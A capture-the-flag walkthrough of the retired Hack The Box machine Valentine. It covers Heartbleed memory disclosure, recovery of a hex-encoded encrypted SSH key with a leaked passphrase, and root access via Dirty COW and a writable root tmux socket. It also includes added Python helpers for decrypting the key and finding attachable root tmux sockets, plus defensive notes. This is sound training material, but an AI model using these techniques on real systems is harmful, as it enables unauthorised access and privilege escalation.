VALENTINE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib5GzB4zJ9QRyMW1tCY0fvKOeg0jhmECnI6LuoGpwlv4rzDEq0XnSM7W3oDabjG6CSS7MMLkpSTZE6UrcHEaE6j-nJ9AuiQrsb3zajZsBWI-44HTNyc0_IdQHfg1t1FjsTvxfFP2xG5U-T/s1600/screenshot.39.jpg)
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Valentine, which is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- Valentine's IP is 10.10.10.79:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxJm7hBSz7wV5iKFNrGAdRQRe_Toq3u2qqW_Gl48aJfd3lh-EYgUDTsVEL9KsoTOcEAZyl5u01N2U8OW7qAS9LCiKlSpbC8c4B8LxWpSXWYchDDQV8-26lG0iu3wHb1EY9Rw5yRfS3rrp0/s400/screenshot.41.jpg)
- Scanning with Nmap:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQlEELs9n8QWrr7vn0_QYHi_LSi-CwyGDeD0rZggN65F5RhG6BX3PLaDFVl9hoJlQ25unJChd0h8OutHXa84yXwfIhuc8v61ijxJ0nWni8NapE1rx-jbZIXM9wdGuUZrG9verQGKSV688w/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt9850pNRGcDnDB2mvFIZ4XuLazVROEfrRc6F_fJpb_d69e1cjUYCzEFcZnbLouvAyTSnz-xswdnRxGaHjzVAOmBMd-kOdBs_Etq4rNJBCIudXzXq0NOt5Zd-Z7488rrz-dtVUPAF_rB7_/s1600/screenshot.5.jpg)
- Browsing to port 80, the landing image is very reminiscent of the Heartbleed vulnerability logo:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm87M3w-BM3NwP2wdOHeFk0kaMrj98E9Cr5TrLezoy7rFE2BBIcz-c0CTMKrvaH3CGdxcBk9_1YhYgp83f_UVHYUkivHklNbgyPt3oASK0RBD8bLKvlYtoM8PuvhQBXMI5FxBNgKR-jpbL/s640/screenshot.4.jpg)
- Same thing with HTTPS at port 443:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA_a9Q-lGoT93ghFMGQdEoCbUtn8vXDz95h1s5KQO7BPAVNYnqzC_9QbKA5Nchkl53r0sMf0sxXEjlKhNPv3t-KqaFXfDM36vuAP8Xf6RLrkG0iedBt7nQ-87_Al9Wi5BTRDSlGAS-9MPY/s640/screenshot.40.jpg)
- There is a lot of information available about the Heartbleed vulnerability (CVE-2014-0160), an OpenSSL bug that lets a client read up to 64 KB of the server process memory per malformed heartbeat request:
http://heartbleed.com/
https://en.wikipedia.org/wiki/Heartbleed
- Nmap's ssl-heartbleed NSE script confirms the Heartbleed vulnerability:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHemQf8_HcIXsHuUpFSzqFBMxt_mjZiuoiQ96Lpa6ZX6Mf5JAm7ZILXf1jMHV1fV3OerWX0KGhCGfuAyuifHAyexHYA3B4V_N2dkGXqGRYexZ30x51hE5xytY2V4DIfQHn6FCq6oewiKdD/s1600/screenshot.13.jpg)
- Dirbusting Valentine's web server:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOLrXOFz1VnoHQj0jOiUpsYDe2arTn8dN38rZrcaTMj5OlB1-P3kocmBUbjrJJDy4h96CZO0BWXX22rkEC48IGampbHCIotW_r1amw6mLEZUx15PznyA4KIPguczVFqDJl_Wm0-2TGoRj5/s1600/screenshot.6.jpg)
- Checking folder /encode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4CzjQK6aT8gu3dTu4Dpu7FGkI-sB6r4sRURak9fiOKMh6uroeepf2rBt-ste2ZI_9Iu2lFAzaU1cKhnHWc3qBxjwtXce-Ass0bVR96Qkc6XlhkZN9yxP98LgN1dUTpHtL8COFNxlW4khp/s1600/screenshot.11.jpg)
- Checking folder /decode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCAwwbM9aJ5trvV077Lv4BSMcPQw13UgbUx-Kx3oppSp1MQ17w-fNhd_C-dVuYfJZPubeY37E0S-27sj-ZY9j3YUPea_hFLQ5PcVzvkH8VGejrdQeoPAS9kiK5uGZITAoHXZs3JmGBGRz_/s1600/screenshot.10.jpg)
- Going to /dev:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqkgJENT58raOKVWSUDZvTBbUFiz-NDxL6eYe0wbZ-eTlkTRrfcAjKwB_UJo4lt-HWq37heFvobXJ7p5AuXPI535CA6wux7yrOrq-H7B_n2u_uXMZtks9sL4ZblmOPnbnd3FwVYNfnnYnT/s1600/screenshot.7.jpg)
- Reading notes.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjmNNlZNRyYi0b8u5lY28RxnW0eiF2AEncoBYoNLtcYZDOGETHvvMVtrvaBtB2zgkG1Kbx36Xql_T-84OKz28iOT67PDndfF6XtnEO5BPQaCwO8VxWsbBjpGk2noVZe801dHhG0a5C0ehj/s1600/screenshot.8.jpg)
- Reading hype_key:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDy5cD0tTuK73m8Ojhu4d1K3JTbjC1UB8yLFZuzb9z7F99CygCBgNxJHP5DqdmH8HBv0T51B6X7sIjVzb7WtjsYnoCWid_Q69TiN6IAxcCa7mhMGm1ZbgVltCv-Y0qksfJjoLuATzs5he5/s1600/screenshot.9.jpg)
- Copying hype_key locally:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWjT3Yz6jhW1BoVqLmWvSKj943CxugTBZ4cL2YG71IExnzFkj9g5xvIkatiBPDI8Ouzpp_ashfY6BXXz0Z5JkkZteDt7p9J8hW7T_3e6eWPcO44tLRFzjdJMFpiTTZsP5j8CeKSdCjqnYZ/s1600/screenshot.12.jpg)
- hype_key is hex-encoded, so let's decode it:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih2N79lh72PWf4OeciLF5r-ZeadzuNSrf8XNDUELGYmmrFdRnN90CqciLzUn36k7J6Iuu_f2465caPPAluI80f4aAfnMhem6qQwWexDcNVKy9uBE-VCzEN6w9egEuOXsBn_nl2l_A1UY_S/s1600/screenshot.14.jpg)
- The decoded file is an encrypted RSA private key in the legacy PEM format. Copying it locally:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFD0e7CcCLBiwEUou3dQpYWE1AGM3qdKawPgBqADDEc-yrVkqcESFEPRPKoWZh0E4-0E97RKOJ3ZORfiKy4T1QKXBjMbE_U_cZoEUFrHVfSIwOQTWMjtkGqF9uyMSKJITHbziINDszlU2s/s1600/screenshot.15.jpg)
3 - EXPLOITATION
- Looking for an exploit for the Heartbleed vulnerability:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-e4H1fDd64Di28e6ssfA-IU6SNhZAhmWc37eg4p2FYcutA1E2GguGDm7xI1DiYmR2X23mAsjnBC1knnY0p7DgKlrXo3UxrT2mFY4ZRa7PMGTq5YWcuU_kMLJfWbINNHdyHZGgFFbc41JU/s1600/screenshot.16.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VWEtltmXb_hRdikIgcpzLt6R6mRQ_ilm4vZMYd22hezwmyYFdtVjxJpnlylFfcM5Ue0JF-v15kXqTQTN60xpNvDaWh5eOz9CovlM05FsMXM0t5qrQx9Abudw72tjE1R9oTP7TXV7uWqv/s1600/screenshot.17.jpg)
- Copying the Python proof-of-concept script 32764.py (the Exploit-DB Heartbleed memory disclosure PoC) to the working folder:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic-rouu8haFd8GifT80B_uLCSJJlVbosFmN1nB5Vv77zOQbZlyu_ZfBEZNSkH_77YJ2yj2Av5uJnDe02kQ6Mp9BhVYuZjFAIDa0YMKhutPdD_mNJzUxUHhjcO0emn4q7u1YxLcU-bTE6iy/s1600/screenshot.18.jpg)
- Now, launching the script against Valentine's IP:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqCTIjY4JjYaWz_A1q7Ru2cvk2JhGYTRKwPmQ_V2Ph2HLekm-weBy4BXcPhJ_9PDgWxtBT_l9FdPInU83wqjxAVEX6Ya9GurHyIH28cS-kdN_6w29Ik95-ywXoIvkk8Bgn0dWdwlNFJOb-/s1600/screenshot.31.jpg)
..................................
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamAqDN-8JyziIt-hkMw6ycKbjCHc4tzI-u4t6sSf5qeoibwz6rOZWRLfL9gNfUMKz6rl25T9Tluz_bWhXmARa1BtrLYcJyzypDpnYR7p_HHf9Y4GXfoG2OAwDUjUDHwj327ptK4mvC1JJ/s1600/screenshot.20.jpg)
- The leaked memory includes a Base64-encoded string (Base64 runs are easy to spot among the binary noise of a heap dump):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh6Fg4CJV8e84q5hRFKnwn063QR1KLAHnQICbEpzhIP1AV6bGVty1gPb4Gp6AMY_FErv-FmunlOgAVmkisYBnarvbQuoWltqmfrwSOtJJdOV39dCNPMzOyAxYAkgYImkS2shGdDOUZdLe8/s400/screenshot.32.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU7N51tXb_ZTMOw_nQ58GgxQnwQdtPahgJVZEP0BrtLZONUzJvMF2KsJTtT9wvgA4C1yWQfDX7TJ4-d4daJsimh3Mj81kcS2xvwIwx69yGKmkCqfl-fBHY6dt6bf6iqqFlylbs80Z9RCK-/s1600/screenshot.34.jpg)
- Decoding the string gives the plain-text value heartbleedbelievethehype:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaYprBnJL2riaPZ9GlJa958p_0mDrIvbv2H6sb16y_UVfMr13WB7QmCcOJ2a8naDtf9G-f_5rpTdzbOgJxuLTvQlC9laborfEFRjgSLOy-cYbr0Ed4a2r5viBq5bcHi-F63DiFKNp7ZNkC/s1600/screenshot.37.jpg)
- Going back to the encrypted key, let's see whether openssl can decrypt it using heartbleedbelievethehype as the passphrase:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgje8-dX-aWewgkNANtg7SMwRqPr3iSnv50gdE9N4xbGPC8ujGceJTjfvoFQB8-mxmT2wzGc6a80GAnk5k_O1719tB_EXOu9bah_zKjX959KoN34-QTjU8nlr7yRu6Xi9rejEkBpIfzbGwi/s1600/screenshot.21.jpg)
- The decrypted SSH private key:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAIihuvq1_z623iv_6R7ZAZUgji847hiw2UuOf9AFhuX1iR-ZRtqCsYdEbXfAEUxSv0VqEFLE2JHn3ZfltJi9BXe-rWO1BxypZmnsmsqH7KJtL9l_jbPCKrlhFysF7IOaNG0zaohQZhfYl/s1600/screenshot.22.jpg)
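The key-recovery chain (hex decode, recognise the encrypted PEM, decrypt with the leaked passphrase) as an added Python example, not code from the page. SAMPLE_PEM and its IV are constructed stand-ins for hype_key, and cipher_key_for() re-implements the key derivation that openssl applies to the passphrase, which makes clear why a passphrase that leaks through Heartbleed is all that stood between the attacker and the key; the decryption itself is still delegated to `openssl rsa`, the command used above.

```python
import hashlib
import os
import re
import subprocess
import tempfile

# Constructed stand-in for hype_key: the real file is the hex text of a complete
# encrypted key; this one carries the same kind of headers over a dummy body.
SAMPLE_PEM = ("-----BEGIN RSA PRIVATE KEY-----\n"
              "Proc-Type: 4,ENCRYPTED\n"
              "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
              "AAAA\n-----END RSA PRIVATE KEY-----\n")
SAMPLE_HEX = " ".join(f"{b:02x}" for b in SAMPLE_PEM.encode())   # same shape as the page's hex dump

KEY_LEN = {"AES-128-CBC": 16, "AES-192-CBC": 24, "AES-256-CBC": 32, "DES-EDE3-CBC": 24}

def hex_to_text(hexdump: str) -> str:
    """Undo the hex encoding of hype_key; whitespace and line breaks are ignored."""
    return bytes.fromhex(re.sub(r"\s+", "", hexdump)).decode("ascii")

def pem_encryption_info(pem: str):
    """(cipher, iv) when a legacy 'RSA PRIVATE KEY' PEM is passphrase protected, else None."""
    m = re.search(r"DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)", pem)
    if "Proc-Type: 4,ENCRYPTED" not in pem or m is None:
        return None
    return m.group(1), bytes.fromhex(m.group(2))

def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int) -> bytes:
    """OpenSSL EVP_BytesToKey with MD5 and one iteration: D_i = MD5(D_{i-1} || pw || salt),
    key = D_1 || D_2 || ... truncated. This is the entire KDF behind legacy encrypted PEM,
    so every passphrase guess costs one MD5 and a leaked hint settles it."""
    key, prev = b"", b""
    while len(key) < key_len:
        prev = hashlib.md5(prev + password + salt).digest()
        key += prev
    return key[:key_len]

def cipher_key_for(pem: str, passphrase: str) -> bytes:
    """The symmetric key openssl derives for this PEM; the salt is the first 8 IV bytes."""
    info = pem_encryption_info(pem)
    if info is None:
        raise ValueError("key is not encrypted")
    cipher, iv = info
    return evp_bytes_to_key(passphrase.encode(), iv[:8], KEY_LEN[cipher])

def decrypt_with_openssl(pem: str, passphrase: str) -> str:
    """The step done by hand above: openssl rsa -in <key> -passin pass:<passphrase>.
    Returns the clear-text PEM; raises CalledProcessError if the passphrase is wrong."""
    fd, path = tempfile.mkstemp(suffix=".pem")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(pem)
        out = subprocess.run(["openssl", "rsa", "-in", path, "-passin", "pass:" + passphrase],
                             capture_output=True, text=True, check=True)
        return out.stdout
    finally:
        os.unlink(path)

if __name__ == "__main__":
    with open("hype_key") as f:
        pem = hex_to_text(f.read())
    print("encryption:", pem_encryption_info(pem))
    with open("hype_key.dec", "w") as f:
        f.write(decrypt_with_openssl(pem, "heartbleedbelievethehype"))
    os.chmod("hype_key.dec", 0o600)   # ssh refuses a private key readable by others
```

The defensive lesson is in evp_bytes_to_key(): the legacy PEM format has no salt worth the name and no iteration count, so its passphrase is only as strong as the secret itself. Keys generated with `ssh-keygen -o -a 100` use the bcrypt KDF instead, and PKCS#8 with `openssl pkcs8 -topk8 -v2 aes-256-cbc` uses PBKDF2; both make offline guessing expensive.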
- SSH-ing into Valentine as user hype with the decrypted key (the key file must be mode 600, otherwise ssh refuses to use it):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZyZTsj_x03LJ1u6VO9hibMtgPqshY-hVZUnTbvJby4F7y0rXfv5k_Yf6h6vIoKgaucM6ALTyhvtplsQ8_mHE6_cvBNCKQA8ac-EDz8wVXgivAHzGmyfI3iwFVk4Z4GmOOrNAQmhRInHr0/s1600/screenshot.23.jpg)
- The remote shell is a low-privileged one:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hLSg14ADN-l7AtJqXCasOSwC8e3IvieucW-ehnbxEEDZ5QzCihWg0a9EsSYrHUQoLzghjRRLFSLLJjw5uPrmu95FXf-byiqukZwDwfdouBJc6NmD9Jet8oYf6w2PzL6ld0UtVgbk1AvB/s1600/screenshot.24.jpg)
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN6rm9UAT1ys21oKpqnBW-ODk3_HVyeWc4W57wjTqPavLgeFvVoUKSAW-96Lwx2vdo1pE6fVTozE7xmhUDkIO0NlMpGR7TnxXRgjLGanXzvDI4-ULCH_vrJL02pVK9PDJEMqkBJxxzob8e/s1600/screenshot.25.jpg)
5 - PRIVILEGE ESCALATION
- Let's try two ways to escalate privileges:
5.1 - Kernel exploitation
- First, checking the operating system version and kernel release:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNV9kblHFHklf1ir21RZxSGCkv56XatClgkpcyM6emLyIFikclqbOpg2LNUXWTkCWq3uz-9snvK5Om7vk2g4Q3x-__dsQolhghY4NWrVfB8pve5G363jXTZwjq8rJZCVOB5pPPoIb7At-I/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX17GjZcf-es_okwJZSI05OyaiU17jqHl6Lx5Dz6yLBcJN9sLx4G-b5YwwDP9Yd3HoOXl83swSJZ76C8JZYIHXnMNdnCixwCd4pEELasqEKHKhZAS0nDEgskNVEvbfxJElARfO7L6BkvRy/s1600/screenshot.4.jpg)
- There are several public exploits for the 3.2 kernel, for instance this one (the Dirty COW race condition, CVE-2016-5195, in the variant that rewrites /etc/passwd with a new UID 0 user named firefart):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBk-wAT_wxf1Tcylbjx7RJT2oXEApGGSN2vnzXLiC3x6I8ycnRn0IidjtEzhmB09Ek-3rqynNRROAcxNrdJ6ZEEb29T1NNTBq1C8uhHyOjQjZtM6_LNGNn_INYTPupDxbWavxTr7lj5S3Y/s1600/screenshot.1.jpg)
- Downloading to Kali and transferring to Valentine:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTv7uWpGF3OUuSkuZsQiZlZ7-H3PPSjPsrohXXabgEKeMlxiP18gYwMZi2lZwMx8YL_2oTJPJyRcunHte2nqFzC9Bx4rJZPDVltjwF7ZD_OZHDfY9cp0QhLBlWli32eOYlWHBTl370fSQp/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQUmh1qjuWaq5lmn0z6QI5eyR0r8GPhN0o_9EDXqNVuMx-SJ0A0nlg9AEO58THrs3lGa_OlSNQVl9sVku5YVQ4cZT0MgebLPaCy9jGztZrEcHJpEsIzo7dpiQ-ZIUBpl8fy8yYAHG-TQko/s1600/screenshot.6.jpg)
- Compiling it according to its instructions:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLS6ysgbTWkgf_pGymsRx7uibFUpiQE_p2Esj2djPgneRy82KB1SSRiNxhZPybQYMSh6EKBCkkSlklGyhydzloYGdtHAGNx4AcayEDluqtvYUL3LA-5F3MD7-XgzBMUjoaBgLQ0rX_48JG/s1600/screenshot.2.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioMWi4C0bBL4DyLVv71HHBV8k1ttaV5_PrfXHDq9sJTpzN8b5yI4YWG8xKIibtiwE3awYOLGc3BnHTgHDOu825ZJQuJeCHlac7HgzpJ_KA5ybjbCUOt7X7qaPJfghNk6FNIs4fKAUYkjnW/s1600/screenshot.7.jpg)
- The exploit asks for a password for the new user, for instance hello:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE-RIisoZwqjjMw1XVfv6GHjH0JbXP116SnSsSWnisiG6Qn77ZHRzyY-jVjLp4ULgXkVayVOQpsWoBJMkGEfs4Z08bKY0HbMqBDss3a9fv_oMkUTApfbicS6yayceACthgH2j9Fnd4ukWe/s1600/screenshot.9.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWjChzjhgwJIoRKKHR_G8DlmSjdDzAPT-FO697WHq1rHxRjRNwV3IFezeRd2H5LpRPxcC2yFZ18LKUMoImYoiIX_ocw93e8b6kn3g2o2OxpSFE7EI01jqrwllIWDnc9nGkK7CPMUH71BdA/s1600/screenshot.8.jpg)
- Switching to the user firefart with the new password hello, we get a root shell. Since the exploit replaces the root entry in /etc/passwd, restore the backup it leaves in /tmp/passwd.bak when done; kernel race exploits like this one can also leave the box unstable, which is why the second, cleaner route below is preferable:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBIAF-Dr_hJOtgiYPgObW6VlnTWpTmb-32pQBYaxA7_qf8W6X4SGYRgSEaxs-30oInFpwps-Pdvk7mQ80rtI7CjmlYCjrbZeaXFkACro0kAZEdPdzKYdvkAaV36EgaEeEgV9N5CLZnIuJ8/s1600/screenshot.11.jpg)
5.2 - Tmux
- Reading the hidden file .bash_history, there is a reference to a tmux command that points at a custom server socket:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwY9miZEu1AXMfFozvxTINtDatEPWZwe7soj_YZn6MulZRGSt7uV6m0ugGoZNrr0IIjZjvnmwOc787ivJZ5gXZ2VcX4v0e_dahkfH-ZTKHD6GsyOnI8UGqynbgeuZqdHRzeYifBjmGTMzO/s1600/screenshot.26.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij5OQoYLk8aTeVRT_4oG_RHSN2WfTuUTDD5LVGzH0KdnFiOP7p8PmLZzyUZGk82Z8u4CHOyv6uUGeeHYZWZzoZJD6GHAf5YPjM4sEb3Quz2DYXHhA9zRs63ot7fzhFZccg5i0ktKf31Wb1/s1600/screenshot.27.jpg)
- Also, ps aux confirms that there is a tmux server running as root:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieORE-boy-aMLtCnFoOBNv6fiObhOXDHT2scDrGuZHkMCD3Nv5bTolOVVHLhOu2HzbC99VnwXEkphSznreXdZVI661kyOo8ZZ65gCqCNwA2DxFY90R3rs_hBQ38zsSz81tsMk88cD6BdRF/s1600/screenshot.42.jpg)
- Finally, running the same tmux command found in .bash_history connects to that root-owned server, and every shell it spawns runs as root. This works only because the socket file is writable by hype (connecting to a Unix socket requires write permission on it), which is the actual misconfiguration here:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq3OFaIgRP7QFyjEbz_dJl015XSP06moVoJByz_H8BhKpI76IK_VvOJRUbVhIrR0Y5rEsaw5UfJMc8rQYB573k5ynv6IN-vpKEpe4AkWGi_atHepNnn5NMZscIbX1RwCaTnRzbXDWXG9Q8/s1600/screenshot.28.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqV52pF_dmZblbs8Gsufs81tYh1zBpr1VVK1yzStqgxPQolhxbR16ADhuNqb9czruy8EuSJrmemlJKdHW10PNXFkb06Iqv5yOid6n8UdyA3Z8wN1VPhW0Z2WXaKdqZiN_27m8PfPL4Zzqy/s1600/screenshot.29.jpg)
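The tmux route generalised into a small enumeration check, as an added Python example that is not part of the original write-up: given a shell history and `ps aux` output it lists root-owned tmux servers, notes which sockets the history shows being used, and tests whether the current user can actually connect to them. SAMPLE_HISTORY, SAMPLE_PS and the socket path /tmp/example_sess are constructed; the real socket on the box is visible only in the screenshots.

```python
import os
import re
import stat
import subprocess

TMUX_SOCKET = re.compile(r"\btmux\b[^\n]*?-S\s+(\S+)")

# Constructed samples: not the target's real history or process list, and
# /tmp/example_sess is a made-up path.
SAMPLE_HISTORY = "ls -la\ntmux -S /tmp/example_sess\nexit\n"
SAMPLE_PS = (
    "USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\n"
    "root         1  0.0  0.1  24000  2300 ?        Ss   10:00   0:01 /sbin/init\n"
    "root      1021  0.0  0.1  26000  1500 ?        Ss   10:01   0:00 tmux -S /tmp/example_sess\n"
    "hype      2042  0.0  0.1  21000  1900 pts/0    Ss   10:05   0:00 -bash\n"
)

def sockets_from_history(history: str):
    """Socket paths from every `tmux ... -S <path>` line in a shell history."""
    return sorted({m.group(1) for m in TMUX_SOCKET.finditer(history)})

def root_tmux_servers(ps_aux: str):
    """(pid, socket or None) for every tmux process owned by root in `ps aux` output."""
    found = []
    for line in ps_aux.splitlines()[1:]:                   # skip the header row
        cols = line.split(None, 10)                       # 11 columns; COMMAND keeps its spaces
        if len(cols) < 11:
            continue
        user, pid, cmd = cols[0], cols[1], cols[10]
        if user != "root" or os.path.basename(cmd.split()[0]) != "tmux":
            continue
        m = TMUX_SOCKET.search(cmd)
        found.append((int(pid), m.group(1) if m else None))
    return found

def candidate_sockets(history: str, ps_aux: str):
    """Root tmux sockets, flagged when the history shows the current user already using them."""
    seen = set(sockets_from_history(history))
    return [(sock, sock in seen) for _, sock in root_tmux_servers(ps_aux) if sock]

def attachable(path: str) -> bool:
    """Connecting to a Unix socket needs write permission on it; a root tmux socket
    that a low-privileged user can write to is the misconfiguration exploited here."""
    try:
        return stat.S_ISSOCK(os.stat(path).st_mode) and os.access(path, os.W_OK)
    except OSError:
        return False

def attach_commands(history: str, ps_aux: str):
    """Commands worth trying: every request sent to a root tmux server (new-session or
    attach) is carried out by that server process, so the resulting shell is root's."""
    return [f"tmux -S {sock}" for sock, _ in candidate_sockets(history, ps_aux) if attachable(sock)]

if __name__ == "__main__":
    with open(os.path.expanduser("~/.bash_history")) as f:
        history = f.read()
    ps_aux = subprocess.run(["ps", "aux"], capture_output=True, text=True, check=True).stdout
    for sock, in_history in candidate_sockets(history, ps_aux):
        print(f"{sock}: in history={in_history}, attachable={attachable(sock)}")
    print("try:", attach_commands(history, ps_aux) or "nothing attachable")
```

Run it from the hype shell to get the same answer the manual steps gave. On the defensive side the fix is not a tmux setting but file permissions: a root tmux socket belongs in a directory only root can traverse, and a root session left running for convenience is a standing credential for whoever can reach its socket.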
6 - CAPTURING THE 2nd FLAG
- Reading root.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia4K0HP3AOX6xvQnh-kncgUjJUTlqDE6uMEeiZDlSQak8s1FUVERLTwhKiRuFS92jU5agQhUIDiawiz7Em2EdB4_ayNFgHGzssfbuWOkrXnxx1_Ozc3aO7WMoWpnOG4nf9areNc7zOFQB_/s1600/screenshot.30.jpg)